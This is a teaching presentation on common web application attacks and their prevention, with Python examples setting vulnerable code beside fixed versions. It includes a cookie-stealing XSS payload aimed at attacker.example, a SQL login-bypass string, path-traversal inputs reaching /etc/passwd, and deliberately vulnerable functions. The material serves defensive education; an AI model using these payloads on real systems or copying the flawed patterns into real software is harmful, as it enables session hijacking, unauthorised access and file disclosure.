In this presentation I have tried to figure out common loopholes through which web applications may fall prey to attackers, common tools used in the trade, and some preventive security measures to keep us on the safer side.
WEB APPLICATION
A client/server software application that interacts with users or other systems over HTTP.
Modern applications are typically written in Java (or similar languages) and run on a distributed application server, connecting to multiple data sources.
Examples of Web Applications:
ii) Online retail sales
Stealing credit card information
Exploiting server-side scripting
Exploiting buffer overflows
Employing malicious code
Destroying data
PLANNING THE ATTACK
LAUNCHING THE ATTACK
CROSS-SITE SCRIPTING (XSS)
Cross-site scripting (XSS) is a security vulnerability typically found in web applications that lets an attacker inject client-side script into web pages viewed by other users. The injected script runs in the victim's browser with the same privileges as the site's own script.
Two forms: a stored attack, where the script is saved on the server and served to every visitor, and a reflected attack, where the script is carried in a link and echoed back by the site.
Reflected attack, step by step:
The hacker finds out that www.mailprovider.com suffers from XSS.
Users get a mail asking them to click a hyperlink ("Click here for a free gift"); the link points at mailprovider.com but carries the hacker's script in its parameters.
When a user clicks, the site echoes the script into its response and the malicious script gets executed.
The browser cannot tell it apart from the site's own script, so it correctly interprets it as script and runs it.
If the script instructs the browser to send the user's cookie to the hacker's computer, the browser quickly complies, and the hacker can use that cookie to hijack the session.
The script may also take the user to a fake web page imitating his online banking site.
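The reflected-attack walk-through above, as an added worked example (not code from the original presentation). It assumes a search page that echoes its query parameter; the payload string and the host name attacker.example are constructed for the demonstration. The vulnerable page hands the browser the hacker's script as part of its own HTML; the fixed page escapes the query on output, and the session cookie is additionally marked HttpOnly so that even a script which does run cannot read it from document.cookie.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload of the kind the slide describes: script that ships the
# victim's cookie to the hacker's host. "attacker.example" is a placeholder.
PAYLOAD = ("<script>new Image().src='http://attacker.example/steal?c='"
           "+document.cookie</script>")


def search_page_vulnerable(query: str) -> str:
    """Reflects the query straight into the HTML: the reflected-XSS bug.
    A link such as ?q=<PAYLOAD> makes the site serve the hacker's script
    to the victim's browser as part of its own page."""
    return f"<h1>Results for {query}</h1>"


def search_page_escaped(query: str) -> str:
    """Same page, but the query is HTML-escaped on output, so '<', '>' and
    quotes arrive as entities and the browser renders them as text."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for the session id with HttpOnly set, so a script
    that does run cannot read the cookie through document.cookie."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")


def browser_would_run_script(page: str) -> bool:
    """Crude stand-in for the browser's HTML parser: is there a live <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(search_page_vulnerable(PAYLOAD))
    print(search_page_escaped(PAYLOAD))
    print(session_cookie_header("abc123"))
```

Escaping belongs at the point of output, in the HTML context the value lands in; the same query inserted into a JavaScript string or a URL attribute needs the escaping rules of that context instead.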
SQL INJECTION
A security exploit in which the attacker injects SQL code through a web form input box or the address bar to gain access to resources and make changes to data.
SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches: any input that is concatenated into a query instead of being passed as data.
var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
Username: anything' or 1=1--
Resulting query:
select * from users where username = 'anything' or 1=1--' and password = ''
The quote closes the string, "or 1=1" makes the condition true for every row, and "--" comments out the password check, so the first user in the table is logged in without a password.
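The login bypass above run against a real database, as an added example that is not part of the original presentation. It uses Python's built-in sqlite3 with a constructed in-memory users table (usernames, passwords and the table layout are assumptions); the concatenated query is built exactly as on the slide, and the parameterized version shows the fix from the preventive measures: the driver passes the input as data, so the quote and the comment marker never reach the SQL parser.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the application's
    database. Plaintext passwords, as on the slide; a real application
    stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, "
                 "username text, password text)")
    conn.executemany("insert into users (username, password) values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def build_vulnerable_sql(username: str, password: str) -> str:
    """String concatenation, exactly as on the slide."""
    return ("select id, username from users where username = '" + username +
            "' and password = '" + password + "'")


def login_vulnerable(conn, username: str, password: str) -> list:
    """Runs the concatenated query: the input becomes part of the SQL, and
    anything' or 1=1-- returns every user (the first row is 'logged in')."""
    return conn.execute(build_vulnerable_sql(username, password)).fetchall()


def login_parameterized(conn, username: str, password: str) -> list:
    """Placeholders: the values are bound as data, so the same payload is just
    a username that matches nobody."""
    sql = "select id, username from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("anything' or 1=1--", ""))
    print("vulnerable   :", login_vulnerable(db, "anything' or 1=1--", ""))
    print("parameterized:", login_parameterized(db, "anything' or 1=1--", ""))
```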
BUFFER OVERFLOW
Occurs when the amount of data written to a buffer exceeds the size of the buffer, overwriting adjacent memory; at best a crash, at worst attacker-controlled code execution.
Cause: boundary checks not done fully, or skipped; a programming error.
After successful exploitation the attacker can:
Gain super-user privilege.
Install a backdoor.
Put a server down.
ZERO-DAY ATTACKS
Zero-day attacks take place between the time a vulnerability is discovered by a researcher or attacker and the time the vendor issues a corrective patch.
Most zero-day attacks are only available as hand-crafted exploit code, but zero-day worms have caused rapid panic.
A zero-day vulnerability is the launching point for further exploitation of the web application and its environment.
Contributing factor: lack of a firewall. Mitigation: enable heuristic scanning, since no signature exists yet for an unknown exploit.
COOKIE POISONING
Cookies are used to maintain session state in the otherwise stateless HTTP.
Cookie poisoning allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
It can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie, because the server trusts whatever the client sends back.
HIDDEN FIELD MANIPULATION
Takes advantage of hidden form fields that work as the only security measure in some applications.
The field is invisible in the browser but freely editable by the client; modifying its value causes the web application to act on the new data.
Consequences:
theft of services (for example a tampered price)
escalation of access (for example a tampered role)
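One added example covering both cookie poisoning and hidden field manipulation (it is not code from the original presentation): both attacks succeed because the server trusts state that it handed to the client. The cookie half signs the session data with an HMAC so a rewritten role is rejected; the hidden-field half re-derives the price from the SKU on the server so the client's price is ignored. The secret key, the catalogue and the cookie layout uid=...;role=... are constructed assumptions.

```python
import hashlib
import hmac

# Assumed server-side secret; in a real deployment it comes from a key store.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"

# Authoritative price list (constructed, prices in cents); the price the
# client sends back in a hidden field is never used.
CATALOGUE = {"SKU-100": 4999, "SKU-200": 1999}


def sign_cookie(payload: str) -> str:
    """payload + '.' + hex HMAC-SHA256(secret, payload)."""
    tag = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_cookie(cookie: str):
    """Returns the payload if the tag checks out, None if tampered or forged."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return payload


def session_from_cookie_unsigned(cookie: str) -> dict:
    """The poisoning-prone design: parse whatever came back from the client."""
    return dict(kv.split("=", 1) for kv in cookie.split(";"))


def session_from_cookie_signed(cookie: str):
    """Hardened: refuse anything whose tag does not verify."""
    payload = verify_cookie(cookie)
    return None if payload is None else session_from_cookie_unsigned(payload)


def checkout_vulnerable(form: dict) -> int:
    """Trusts the hidden 'price' field, so the client picks its own total."""
    return int(form["price"]) * int(form["qty"])


def checkout_fixed(form: dict) -> int:
    """Re-derives the price from the SKU server-side; the hidden field is ignored."""
    qty = int(form["qty"])
    if qty <= 0:
        raise ValueError("quantity must be positive")
    return CATALOGUE[form["sku"]] * qty


if __name__ == "__main__":
    cookie = sign_cookie("uid=5;role=user")
    print(cookie)
    print(session_from_cookie_signed(cookie))
    print(session_from_cookie_signed(cookie.replace("role=user", "role=admin")))
    form = {"sku": "SKU-100", "price": "1", "qty": "3"}   # price edited by the client
    print(checkout_vulnerable(form), checkout_fixed(form))
```

Signing keeps the server from being lied to about data it wrote itself; it does not hide the data, so anything the user must not see belongs in server-side session storage keyed by an opaque random identifier.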
DIRECTORY TRAVERSAL
The attack occurs when the attacker is able to browse directories and files outside the normal application path, typically by supplying "../" sequences in a path parameter.
The attack exposes the directory structure of the application, and often the underlying web server and operating system.
The attacker can enumerate contents, access secure or restricted pages, gain confidential information, locate source code, and so on.
Cause: no provision of access rights for protected areas of the site.
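The traversal above in code, as an added example that is not part of the original presentation. The document root /var/www/app/public is a constructed assumption and nothing is read from disk; paths are only resolved. The vulnerable resolver joins the request path onto the root without checking where it ends up, so "../" sequences, their URL-encoded form and an absolute path all escape. The safe resolver decodes once, normalises, and refuses any result that is not the root or beneath it.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root; paths are only resolved, nothing is read from disk.
DOC_ROOT = "/var/www/app/public"


def resolve_vulnerable(requested: str) -> str:
    """Joins the URL-decoded request path onto the document root and
    normalises it, with no check that the result is still inside DOC_ROOT.
    An absolute path makes join() discard DOC_ROOT entirely."""
    return posixpath.normpath(posixpath.join(DOC_ROOT, unquote(requested)))


def resolve_safe(requested: str):
    """Decodes once (as the web server does), strips a leading slash so join()
    cannot discard DOC_ROOT, normalises away '..' segments, then refuses any
    result that is not DOC_ROOT or a path beneath it. Returns None on refusal.
    The trailing '/' in the prefix test stops /var/www/app/public_old from
    passing as 'inside' the root. On a real filesystem apply os.path.realpath
    before this test so symlinks are resolved as well."""
    relative = unquote(requested).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, relative))
    if candidate != DOC_ROOT and not candidate.startswith(DOC_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("css/site.css", "../../../../etc/passwd",
                "%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "/etc/passwd"):
        print(f"{req!r:45} vulnerable -> {resolve_vulnerable(req)}")
        print(f"{'':45} safe       -> {resolve_safe(req)}")
```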
ERROR MESSAGES
Information in error messages is often rich with web-site-specific detail which an attacker can use to:
Determine the technologies used in the site (server, framework, database).
Determine whether an attack attempt was successful or not.
Receive hints for attack methods to try next.
PREVENTIVE MEASURES
Validation of query strings, form fields and hidden fields against a rigorous specification.
Filtering (escaping) script output.
Structuring requests such that all supplied parameters are treated as data rather than potentially executable content (parameterized queries).
Validating input length in forms and carrying out bounds checks.
Defining access rights to protected areas of the website.
Applying checks/hot fixes.
Updating the web server with security patches in a timely manner.
Digitally signed and time-stamped logs.
Separate log for system events and transaction log for
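An added example (not code from the original presentation) serving two of the points above: the error-message slide and the signed, time-stamped, separated logs. Each log record carries a timestamp, the tag of the previous record and an HMAC-SHA256 tag over the record, so editing, deleting or reordering an entry breaks verification; the signing key and the log names are constructed assumptions. The request wrapper writes the full exception and stack trace to the system log under a reference id and returns only a generic message with that id to the client, so the error message carries none of the technology or query detail the attacker is looking for.

```python
import hashlib
import hmac
import json
import time
import traceback
import uuid

# Assumed signing key; in practice it lives with the log collector, so a
# compromised application server cannot re-sign records it altered.
LOG_KEY = b"constructed-log-signing-key"
GENESIS = "0" * 64


class SignedLog:
    """Append-only log: every record carries a timestamp, the previous
    record's tag and an HMAC-SHA256 tag over the record itself (a chain)."""

    def __init__(self, name: str):
        self.name = name
        self.records = []
        self._last_tag = GENESIS

    @staticmethod
    def _tag(unsigned: dict) -> str:
        body = json.dumps(unsigned, sort_keys=True).encode()
        return hmac.new(LOG_KEY, body, hashlib.sha256).hexdigest()

    def append(self, event: dict, ts: float = None) -> dict:
        record = {"log": self.name, "ts": time.time() if ts is None else ts,
                  "prev": self._last_tag, "event": event}
        record["tag"] = self._tag(record)
        self._last_tag = record["tag"]
        self.records.append(record)
        return record

    def verify(self) -> bool:
        """False if any record was edited, removed or reordered."""
        prev = GENESIS
        for rec in self.records:
            unsigned = {k: v for k, v in rec.items() if k != "tag"}
            if unsigned["prev"] != prev:
                return False
            if not hmac.compare_digest(self._tag(unsigned), rec["tag"]):
                return False
            prev = rec["tag"]
        return True


SYSTEM_LOG = SignedLog("system")            # errors, auth failures, config changes
TRANSACTION_LOG = SignedLog("transaction")  # what users did, for audit


def handle_request(handler, **params) -> dict:
    """Runs a handler (params must be JSON-serialisable). Full failure detail
    goes to the system log under a reference id; the client sees only a
    generic message and that id, so nothing about the stack or query leaks."""
    try:
        result = handler(**params)
        TRANSACTION_LOG.append({"action": handler.__name__, "params": params,
                                "status": "ok"})
        return {"status": 200, "body": result}
    except Exception as exc:
        ref = uuid.uuid4().hex
        SYSTEM_LOG.append({"ref": ref, "action": handler.__name__,
                           "error": repr(exc), "trace": traceback.format_exc()})
        return {"status": 500,
                "body": f"An internal error occurred. Reference: {ref}"}


if __name__ == "__main__":
    def lookup(user_id):
        raise RuntimeError("syntax error in: select * from users where id = " + user_id)
    print(handle_request(lookup, user_id="1'"))
    print(handle_request(lambda x: x * 2, x=21))
    print("system log intact:", SYSTEM_LOG.verify())
    print("transaction log intact:", TRANSACTION_LOG.verify())
```

The reference id is what support staff use to find the detailed record; the chain lets an investigator show that the record they found is the one that was written at the time.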